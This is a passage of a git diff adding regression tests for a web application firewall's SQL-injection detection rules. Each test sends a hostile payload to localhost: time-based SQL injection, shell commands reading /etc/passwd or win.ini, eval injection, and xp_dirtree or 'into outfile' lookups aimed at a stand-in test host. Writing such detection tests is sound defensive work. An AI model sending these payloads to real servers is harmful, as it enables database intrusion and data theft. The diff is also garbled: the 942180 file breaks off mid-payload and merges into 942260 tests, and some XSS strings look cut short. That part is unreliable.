injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=file:/init.ini'.sleep(12).'" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-12 + desc: "Advanced SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=1)and (select*from(select(sleep(12)))a)-- : 1)and (select*from(select(sleep(12)))a)--" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-13 + desc: "Advanced SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=(select load_file('\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\unitests.corerule'||'set.org\\\\\\\\\\\\\\\\hvs'))" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-14 + desc: "Advanced SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=/path/to/file/config.ini')and (select*from(select(sleep(12)))a)--" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-15 + desc: "Simple injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=${@print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110))}" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-16 + desc: "Simple injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=test{${sleep(12)}}" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-17 + desc: "Advanced injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=test\"+eval(compile('for x in range(1):\\n import time\\n time.sleep(12)','a','single'))+\"" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-18 + desc: "Advanced injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=test\"+(function(){if(typeof gs78r==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);gs78r=1;}}())+\"" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-19 + desc: "Simple injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=\\foobar.txt\" or sleep(4) #" + version: HTTP/1.0 + output: + log_contains: id "942150" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml new file mode 100644 index 000000000..b27243430 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml @@ -0,0 +1,141 @@ +--- +meta: + author: "Christian S.J. Peron, Christoph Hansen" + description: None + enabled: true + name: 942160.yaml +tests: + - test_title: 942160-1 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: GET + port: 80 + uri: "/?sql_table=sleep%28534543%29" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_title: 942160-2 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "sleEP(3)" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_title: 942160-3 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "sleep(5000)" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_title: 942160-4 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "BENChmARk(2999/**/999,Md5(NoW()" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_title: 942160-5 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "BEncHMARk(2999999,Md5(NoW('')" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_title: 942160-6 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "BENCHMARK(5000000,MD5(0x48416166)" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_title: 942160-7 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "benchmark(3000000,M%445(4)" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_title: 942160-8 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=BENCHMARK(1000000, md5\" AND 1883=1883-- GSCC('')" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_title: 942160-9 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=BeNChMaRK(1000000, md5 AND 9796=4706('')" + version: HTTP/1.0 + output: + log_contains: id "942160" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml new file mode 100644 index 000000000..937665bf3 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml @@ -0,0 +1,37 @@ +--- +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942180.yaml +tests: + - test_title: 942180-1 + desc: "basic SQL authentication bypass" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: GET + port: 80 + # something simple like 3' ' 1 + uri: "/?var=3%27%20%27%201" + version: HTTP/1.0 + output: + log_contains: id "942180" + - test_title: 942180-2 + desc: "XSS test based on portswigger XSS cheatsheet" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + version: HTTP/1.0 + data: "javascript:\"/*'/*`/*-->%ptkjp;" + version: HTTP/1.0 + output: + log_contains: id "942260" + - test_title: 942260-7 + desc: "Embedded shell execution" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=` /bin/cat /etc/passwd`" + version: HTTP/1.0 + output: + log_contains: id "942260" + - test_title: 942260-8 + desc: "Embedded shell execution" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=0.84622338492032948`echo${IFS}crs312``echo${IFS}34test`" + version: HTTP/1.0 + output: + log_contains: id "942260" + - test_title: 942260-9 + desc: "Embedded shell execution" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=`echo crs312``echo 34test`" + version: HTTP/1.0 + output: + log_contains: id "942260" + - test_title: 942260-10 + desc: "Embedded shell execution" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=123-456-01@coreruleset.org'|ping -c 1337 127.0.0.1 #" + version: HTTP/1.0 + output: + log_contains: id "942260" + - test_title: 942260-11 + desc: "Advanced embedded shell execution" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=1);declare @q varchar(99);set @q='\\\\j0kwbatxjfgjp0qu3ibonwovamgmkq8h05unittests.corerule' 'set.org\\kph'; exec master.dbo.xp_dirtree @q;--" + version: HTTP/1.0 + output: + log_contains: id "942260" + - test_title: 942260-12 + desc: "Advanced embedded shell execution" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=content.ini);declare @q varchar(99);set @q='\\\\i1kvc9uwkehiqzrt4hcnovpublhunittests.corerule' 'set.org\\lri'; exec master.dbo.xp_dirtree @q;--" + version: HTTP/1.0 + output: + log_contains: id "942260" + - test_title: 942260-13 + desc: "Advanced embedded shell execution" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=EmptyValue', '4', '2', '7');declare @q varchar(99);set @q='\\\\h5nug8yvodlhuyvs8ggmsuttfklkcjunittests.corerule'+'set.org\\vcr'; exec master.dbo.xp_dirtree @q;--" + version: HTTP/1.0 + output: + log_contains: id "942260" + - test_title: 942260-14 + desc: "Advanced embedded shell execution" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=test));declare @q varchar(99);set @q='\\\\zwzc7qpdfvczlgmazy74jckb62cunittests.corrule'+'set.org\\gej'; exec master.dbo.xp_dirtree @q;--" + version: HTTP/1.0 + output: + log_contains: id "942260" + - test_title: 942260-15 + desc: "Advanced embedded shell execution" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=/config.ini' into outfile '\\\\\\\\il7vw9ew4e1iazbtohwn8v9uvl1hunitetests.coreruleset.org\\\\yxq'; --" + version: HTTP/1.0 + output: + log_contains: id "942260" + - test_title: 942260-16 + desc: "Advanced embedded shell execution" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=EmptyValue into outfile '\\\\\\\\jviw6aoxefbjk0luyi6oiwjv5unittests.coreruleset.org\\\\xct'; --" + version: HTTP/1.0 + output: + log_contains: id "942260" + - test_title: 942260-17 + desc: "Advanced embedded shell execution" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=test@coreruleset.org\"|type %SYSTEMROOT%\\win.ini" + version: HTTP/1.0 + output: + log_contains: id "942260" + - test_title: 942260-18 + desc: "Traces of XSS" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=mytest>'>\">" + version: HTTP/1.0 + output: + log_contains: id "942260" + - test_title: 942260-19 + desc: "Advanced SQL authentication bypass" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=\"123-456-123@coreruleset.org\"' and (select*from(select(sleep(10)))a)--" + version: HTTP/1.0 + output: + log_contains: id "942260" + - test_title: 942260-20 + desc: "Advanced embedded shell execution" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=\"tester@coreruleset.org\"' waitfor delay'0:0:20'--" + version: HTTP/1.0 + output: + log_contains: id "942260" + - test_title: 942260-21 + desc: "Advanced embedded shell execution" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=\"-->'-->`-->" + version: HTTP/1.0 + output: + log_contains: id "942260" + - test_title: 942260-22 + desc: "Traces of XSS" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var='\">" + version: HTTP/1.0 + output: + log_contains: id "942260" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml new file mode 100644 index 000000000..4ca250431 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml @@ -0,0 +1,21 @@ +--- +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942270.yaml +tests: + - test_title: 942270-1 + desc: "basic sql injection. Common attack string for mysql, oracle and others" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: GET + port: 80 + uri: "/?var=union%20select%20col%20from" + version: HTTP/1.0 + output: + log_contains: id "942270" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml new file mode 100644 index 000000000..9b123be7c --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml @@ -0,0 +1,21 @@ +--- +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942280.yaml +tests: + - test_title: 942280-1 + desc: "Postgres pg_sleep injection, waitfor delay attacks and database shutdown attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: GET + port: 80 + uri: "/?var=select%20pg_sleep" + version: HTTP/1.0 + output: + log_contains: id "942280" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml new file mode 100644 index 000000000..a14e15a2a --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml @@ -0,0 +1,35 @@ +--- +meta: + author: csanders-git + description: None + enabled: true + name: 942290.yaml +tests: + - test_title: 942290-1 + desc: Test as described in http://www.client9.com/article/five-interesting-injection-attacks/ + stages: + - stage: + input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: /mongo/show.php?u_id[$ne]=2 + headers: + User-Agent: ModSecurity CRS 3 Tests + Host: localhost + output: + log_contains: id "942290" + - test_title: 942290-2 + desc: "basic MongoDB SQL injection attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: GET + port: 80 + uri: "/?mongoQ=%5b%24lte%5dasdfsd" + version: HTTP/1.0 + output: + log_contains: id "942290" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml new file mode 100644 index 000000000..8f9f694a8 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml @@ -0,0 +1,21 @@ +--- +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942300.yaml +tests: + - test_title: 942300-1 + desc: "MySQL comments, conditions and ch(a)r injectionss" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + data: "var=) when 234 then&foo=bar" + version: HTTP/1.0 + output: + log_contains: id "942300" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml new file mode 100644 index 000000000..ebc6d8f40 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml @@ -0,0 +1,21 @@ +--- +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942310.yaml +tests: + - test_title: 942310-1 + desc: "chained SQL injection attempts 2/2" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: GET + port: 80 + uri: "/?var=%22%27%20and%20%3d%20bar" + version: HTTP/1.0 + output: + log_contains: id "942310" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml new file mode 100644 index 000000000..09911991f --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml @@ -0,0 +1,66 @@ +--- +meta: + author: "Christian S.J. Peron, Christoph Hansen" + description: None + enabled: true + name: 942320.yaml +tests: + - test_title: 942320-1 + desc: "Detects MySQL and PostgreSQL stored procedure/function injections" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + data: "var=procedure%20analyse%20%28" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_title: 942320-2 + desc: "Detects MySQL and PostgreSQL stored procedure/function injections" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=exec+%28%40%0A" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_title: 942320-3 + desc: "Detects MySQL and PostgreSQL stored procedure/function injections" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=declare+%40b%0A" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_title: 942320-4 + desc: "Detects MySQL and PostgreSQL stored procedure/function injections" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=DECLARE%2F%2A%2A%2F%40x%0A" + version: HTTP/1.0 + output: + log_contains: id "942320" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml new file mode 100644 index 000000000..e82bf5ce2 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml @@ -0,0 +1,21 @@ +--- +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942330.yaml +tests: + - test_title: 942330-1 + desc: "classic SQL injection probings 1/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + data: "var=%22%27&var2=whatever" + version: HTTP/1.0 + output: + log_contains: id "942330" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml new file mode 100644 index 000000000..355edef41 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml @@ -0,0 +1,22 @@ +--- +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942340.yaml +tests: + - test_title: 942340-1 + desc: "basic SQL authentication bypass attempts 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: GET + port: 80 + # in ( select * from + uri: "/?var=in%20%28%20select%20%2a%20from" + version: HTTP/1.0 + output: + log_contains: id "942340" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml new file mode 100644 index 000000000..39c372051 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml @@ -0,0 +1,37 @@ +--- +meta: + author: "Christian S.J. Peron, Franziska Bühler" + description: None + enabled: true + name: 942350.yaml +tests: + - test_title: 942350-1 + desc: "MySQL UDF injection and other data/structure manipulation" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: GET + port: 80 + # ; insert INTO table (word) VALUES('dfsd') + uri: "/?var=%3bINSERT%20INTO%20table%20%28col%29%20VALUES" + version: HTTP/1.0 + output: + log_contains: id "942350" + - test_title: 942350-2 + desc: "Fix for FP reported in GitHub issue 1587" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: GET + port: 80 + # ;insertion_424242 + uri: "/?var=%3Binsertion_424242" + version: HTTP/1.0 + output: + no_log_contains: id "942350" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml new file mode 100644 index 000000000..5f3677241 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml @@ -0,0 +1,493 @@ +--- +meta: + author: "Christian S.J. Peron, Christoph Hansen, Franziska Buehler" + description: None + enabled: true + name: 942360.yaml +tests: + - test_title: 942360-1 + desc: "concatenated basic SQL injection and SQLLFI" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + # 23423 as "sdfsdfs" FROM table + data: "var=1234%20AS%20%22foobar%22%20FROM%20tablevar2=whatever" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-2 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "select Char(" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-3 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "SELECT CHAR(" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-4 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "SELECT GROUP_CONCAT(" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-5 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "SELECT group_cOnCat(" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-6 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: ") as cc FROM" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-7 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: ") AS orders FROM" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-8 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: ") AS `carrier_id` from" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-9 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "select load_file(" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-10 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: ") AS Role FROM" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-11 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "` AS `edit_user_id` from" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-12 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: ") AS val FROM" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-13 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=%60+REGEXP%20" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-14 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: ") AS 'Durchschnitt_Importzeit' FROM" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-15 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "` AS `OXTIMESTAMP` from" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-16 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: ") as col_0_0_ from" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-17 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: ") AS `count` FROM" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-18 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: ") AS schlagwoerter FROM" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-19 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: ") as User from" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-20 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: ") AS t FROM" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-21 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "(load_file(" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-22 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: ") as ExecuteTheseSQLCommands FROM" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-23 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: ") AS schlagwoerter FROM" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-24 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "` AS `documentType` FROM" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-25 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "! As' from" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-26 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "; As not from" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-27 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "SELECT load_file(" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-28 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: 